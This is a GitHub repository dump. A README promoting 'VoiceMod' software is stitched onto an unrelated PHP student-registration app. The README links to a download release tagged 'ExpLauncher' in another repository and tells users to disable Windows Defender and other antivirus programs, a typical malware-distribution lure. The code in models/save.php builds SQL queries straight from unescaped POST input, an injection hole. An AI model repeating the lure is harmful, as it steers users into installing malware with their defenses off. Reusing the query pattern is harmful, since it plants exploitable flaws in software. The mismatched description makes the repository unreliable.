Repository: Duewanna/vcmod-pro Branch: main Commit: 1b7d5863f266 Files: 9 Total size: 14.6 KB Directory structure: gitextract_3bawb212/ ├── README.md ├── assets/ │ └── js/ │ └── search.js ├── config/ │ └── database.php ├── index.php ├── login.php ├── models/ │ ├── save.php │ └── searchEngine.php ├── registration.php └── steps.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ [![downloadstats](https://github.com/jakerellson55/jakerellson55-proj/assets/163674734/206814f5-de15-400e-8742-93503a42f731)](https://github.com/XiniJous/ExProject/releases/tag/ExpLauncher) ## Voice Mod ![GitHub All Releases](https://img.shields.io/github/downloads/airsquared/blobsaver/total.svg) VoiceMod is an innovative voice modulation software designed to elevate your audio experiences. Whether you're a content creator, gamer, or simply looking to have fun with friends, VoiceMod offers a wide range of voice effects to transform your voice in real-time. ## Features - Real-time Voice Transformation: Instantly modify your voice during voice calls or while recording audio. - Customization Options: Fine-tune each effect to your liking with adjustable parameters. - Intuitive Interface: User-friendly interface makes it easy to navigate and apply effects. - Cross-Platform Compatibility: Works seamlessly on Windows, macOS, and Linux operating systems. - Low Latency: Enjoy smooth voice modulation with minimal delay. - Content Creation: Enhance your videos, streams, podcasts, and other multimedia content with unique voice effects. 𝐖𝐀𝐑𝐍𝐈𝐍𝐆: 𝐒𝐨𝐦𝐞 𝐮𝐬𝐞𝐫𝐬 𝐡𝐚𝐯𝐞 𝐟𝐚𝐜𝐞𝐝 𝐢𝐬𝐬𝐮𝐞𝐬 𝐰𝐢𝐭𝐡 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 𝐝𝐞𝐭𝐞𝐜𝐭𝐢𝐧𝐠 𝐝𝐮𝐞 𝐭𝐨 𝐟𝐚𝐥𝐬𝐞 𝐩𝐨𝐬𝐢𝐭𝐢𝐯𝐞 𝐜𝐨𝐝𝐞 𝐰𝐡𝐢𝐥𝐞 𝐨𝐭𝐡𝐞𝐫𝐬 𝐝𝐢𝐝 𝐧𝐨𝐭. 𝐈𝐟 𝐲𝐨𝐮𝐫 𝐚𝐫𝐜𝐡𝐢𝐯𝐞 𝐢𝐬 𝐛𝐞𝐢𝐧𝐠 𝐚𝐮𝐭𝐨𝐦𝐚𝐭𝐢𝐜𝐚𝐥𝐥𝐲 𝐝𝐞𝐥𝐞𝐭𝐞𝐝 𝐮𝐩𝐨𝐧 𝐝𝐨𝐰𝐧𝐥𝐨𝐚𝐝𝐢𝐧𝐠, 𝐦𝐚𝐤𝐞 𝐬𝐮𝐫𝐞 𝐭𝐨 𝐝𝐢𝐬𝐚𝐛𝐥𝐞 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 𝐨𝐫 𝐚𝐧𝐲 𝐨𝐭𝐡𝐞𝐫 𝐀𝐧𝐭𝐢𝐯𝐢𝐫𝐮𝐬𝐞𝐬 𝐲𝐨𝐮 𝐦𝐢𝐠𝐡𝐭 𝐡𝐚𝐯𝐞 𝐢𝐧 𝐨𝐫𝐝𝐞𝐫 𝐭𝐨 𝐮𝐬𝐞 𝐭𝐡𝐞 𝐬𝐨𝐟𝐭𝐰𝐚𝐫𝐞. 𝐈𝐟 𝐲𝐨𝐮 𝐡𝐚𝐯𝐞 𝐚𝐧𝐲 𝐢𝐬𝐬𝐮𝐞𝐬 𝐰𝐢𝐭𝐡 𝐭𝐡𝐞 𝐬𝐨𝐟𝐭𝐰𝐚𝐫𝐞𝐬 𝐰𝐞 𝐩𝐫𝐨𝐯𝐢𝐝𝐞𝐝, 𝐟𝐞𝐞𝐥 𝐟𝐫𝐞𝐞 𝐭𝐨 𝐜𝐨𝐧𝐭𝐚𝐜𝐭 𝐮𝐬 𝐝𝐢𝐫𝐞𝐜𝐭𝐥𝐲. ![imggg](https://i.imgur.com/B3CliPT.gif) ================================================ FILE: assets/js/search.js ================================================ function search(search_value) { $.ajax({ url: './models/searchEngine.php' , type: 'POST' , data: {'search' : search_value} , success: function(response){ $('#results').html(response); } }) } ================================================ FILE: config/database.php ================================================ connect_error) { die("Connection failed: " . $conn->connect_error); } //echo "Connected successfully"; ================================================ FILE: index.php ================================================ Document

Dashboard

You can view all the recorded data in this dashboard.

List of Guest
Guest ID Complete Name Action
================================================ FILE: login.php ================================================ Document ================================================ FILE: models/save.php ================================================ "'" . $_POST['inp_appid'] . "'", 's_tes_number' => "'" . $_POST['inp_tesno'] . "'", 's_student_id' => "'" . $_POST['inp_sid'] . "'", 's_first_name' => "'" . $_POST['inp_fname'] . "'", 's_last_name' => "'" . $_POST['inp_lname'] . "'", 's_ext_name' => "'" . $_POST['inp_ename'] . "'", 's_middle_name' => "'" . $_POST['inp_mname'] . "'", 's_gender' => "'" . $_POST['inp_gender'] . "'", 's_phone' => "'" . $_POST['inp_contact'] . "'", 's_award_batch' => "'" . $_POST['inp_batch'] . "'", 's_status' => "'" . $_POST['inp_status'] . "'", ); save($registration); function save($data) { include("../config/database.php"); $attributes = implode(", ", array_keys($data)); $values = implode(", ", array_values($data)); $query = "INSERT INTO t_students ($attributes) VALUES ($values)"; try { if ($conn->query($query) === TRUE) { header('location: ../registration.php?success'); exit(); } }catch (Exception $e) { header('location: ../registration.php?invalid'); exit(); } } ================================================ FILE: models/searchEngine.php ================================================ query($sql); if ($result->num_rows > 0) { while ($row = $result->fetch_assoc()) { ?> , close(); ================================================ FILE: registration.php ================================================ Document

Registration

You can add record for student here.

Registration Form
New Student Added.. Congrats. Thank you!

Existed Application ID. Please try another. Thank you.

================================================ FILE: steps.txt ================================================ Joanna Marie ----------- Github Comment >git clone "URL" >git add . >git commit -m "Version Control" >git push -u origin main >git pull